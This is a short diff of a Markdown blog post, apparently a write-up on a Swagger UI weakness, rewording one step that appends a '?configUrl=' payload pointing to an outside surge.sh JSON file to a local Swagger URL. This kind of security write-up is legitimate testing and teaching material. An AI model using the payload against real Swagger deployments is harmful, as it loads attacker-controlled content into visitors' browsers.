khawla-abdulsattar/khawla-abdulsattar.github.io/content/posts/post-1.md

  https://127.0.0.1/swagger/index.html.
 ```

-- Append the following to the URL:
+- Append the following payload to the URL _ I used this payload as shown below _:

 ```
 ?configUrl=https://tearful-earth.surge.sh/test.json.